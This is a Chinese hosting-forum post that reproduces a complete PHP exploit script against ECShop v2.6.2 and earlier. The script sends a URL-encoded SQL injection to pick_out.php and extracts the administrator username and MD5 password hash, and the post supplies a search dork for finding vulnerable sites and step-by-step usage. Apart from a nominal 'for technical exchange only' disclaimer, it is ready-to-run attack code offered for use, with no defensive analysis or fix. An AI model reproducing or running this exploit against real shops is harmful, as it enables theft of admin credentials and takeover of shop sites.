$7.49 .com domain with free InstantPage Website Builder$1.99 Web Hosting   捷飞网络官方淘宝店   Godaddy 优惠码
返回列表 发帖
分享到:




[Bug&安全&补丁] [ bug] ECShop <= v2.6.2 SQL injection / admin credentials

  1. #!/usr/bin/php
  2. <?php
  3. //本程序只作技术交流,请不要用做非法用途!!
  4. print_r('
  5. +---------------------------------------------------------------------------+
  6. ECShop <= v2.6.2 SQL injection / admin credentials disclosure exploit
  7. by puret_t
  8. mail: puretot at gmail dot com
  9. team: http://bbs.wolvez.org
  10. dork: "Powered by ECShop"
  11. +---------------------------------------------------------------------------+
  12. ');
  13. /**
  14. * works with magic_quotes_gpc = Off
  15. */
  16. if ($argc < 3) {
  17. print_r('
  18. +---------------------------------------------------------------------------+
  19. Usage: php '.$argv[0].' host path
  20. host: target server (ip/hostname)
  21. path: path to ecshop
  22. Example:
  23. php '.$argv[0].' localhost /ecshop/
  24. +---------------------------------------------------------------------------+
  25. ');
  26. exit;
  27. }

  28. error_reporting(7);
  29. ini_set('max_execution_time', 0);

  30. $host = $argv[1];
  31. $path = $argv[2];

  32. $resp = send();
  33. preg_match('#IN\s\(([\S]+):([a-z0-9]{32})\)#', $resp, $hash);

  34. if ($hash)
  35. exit("Expoilt Success!\nadmin:\t$hash[1]\nPassword(md5):\t$hash[2]\n");
  36. else
  37. exit("Exploit Failed!\n");

  38. function send()
  39. {[hide]
  40. global $host, $path;

  41. $cmd = 'cat_id=999999&attr[%27%20UNION%20SELECT%20CONCAT(user_name%2c0x3a%2cpassword)%20as%20goods_id%20FROM%20ecs_admin_user%20WHERE%20action_list%3d%27all%27%20LIMIT%201%23]=ryat';

  42. $data = "GET ".$path."pick_out.php?".$cmd." HTTP/1.1\r\n";
  43. $data .= "Host: $host\r\n";
  44. $data .= "Connection: Close\r\n\r\n";

  45. $fp = fsockopen($host, 80);
  46. fputs($fp, $data);

  47. $resp = '';

  48. while ($fp && !feof($fp))
  49. $resp .= fread($fp, 1024);

  50. return $resp;
  51. }

  52. ?>
复制代码
[/hide]


返回列表
Namecheap
Namecheap.com - Cheap domain name registration, renewal and transfers - Free SSL Certificates - Web Hosting
互联网安全